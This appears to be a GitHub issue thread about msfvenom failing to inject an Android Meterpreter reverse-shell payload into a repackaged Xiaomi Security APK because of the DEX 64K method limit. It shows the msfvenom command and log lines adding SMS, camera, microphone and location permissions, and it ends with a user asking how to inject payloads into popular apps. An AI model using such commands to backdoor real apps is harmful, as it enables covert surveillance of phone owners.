apktool execution failed: Unsigned short value out of range: 65577

[bcoles]

When using a template APK file with msfvenom, injecting the Meterpreter payload may exceed the DEX 64K reference limit.

Android app (APK) files contain executable bytecode files in the form of Dalvik Executable (DEX) files, which contain the compiled code used to run your app. The Dalvik Executable specification limits the total number of methods that can be referenced within a single DEX file to 65,536—including Android framework methods, library methods, and methods in your own code. ~ https://developer.android.com/studio/build/multidex

See also: https://github.com/iBotPeaches/Apktool/issues/2496

# ./msfvenom -x apks/Xiaomi\ Security\ 6.0.5-220217.0.2.apk -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: apks/Xiaomi Security 6.0.5-220217.0.2.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.miui.securitycenter.qefiu
[*] Loading /tmp/d20220313-315587-17xlikz/original/smali_classes2/com/miui/securitycenter/Application.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220313-315587-17xlikz/output.apk
[-] I: Using Apktool 2.6.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method La/c/d;->clone()La/c/d;
	at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1047)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:346)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:301)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
	at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:426)
	at brut.androlib.Androlib.buildSources(Androlib.java:357)
	at brut.androlib.Androlib.build(Androlib.java:309)
	at brut.androlib.Androlib.build(Androlib.java:276)
	at brut.apktool.Main.cmdBuild(Main.java:255)
	at brut.apktool.Main.main(Main.java:81)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x12
	at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1320)
	at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1043)
	... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65577
	at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
	at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
	at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1280)
	... 11 more

Error: apktool execution failed

[unfairDude]

Did you found a solution for this? 2 days trying many times without success

[bcoles]

Did you found a solution for this? 2 days trying many times without success

No one is working on this issue. It has not been fixed in msfvenom.

[Dorabot2222]

Same error

[TOXICCODER5715]

After trying all the solutions possible, I am still getting ERROR: apktool execution failed. Please help me to fix this problem because none of the solutions are working.

[k4li0]

Mismo error :(

[adfoster-r7]

I'm not sure if there's anything we can do here apart from give the user a better error message? Or try to get smaller payloads, but the same underlying issue would exist 🤔

[bcoles]

I'm not sure if there's anything we can do here

multidex apparently

apart from give the user a better error message?

For now, as there's no intention to fix it, this issue exists as a reference for users who encounter this error.

The underlying message is from apktool. We could check for it and point users here.

Or try to get smaller payloads, but the same underlying issue would exist 🤔

This is unlikely to help. Also, some popular APKs are suspiciously close to the DEX 64K reference limit, presumably to prevent injection.

[Haaarshit010]

So is there any way we can inject payload in popular apps?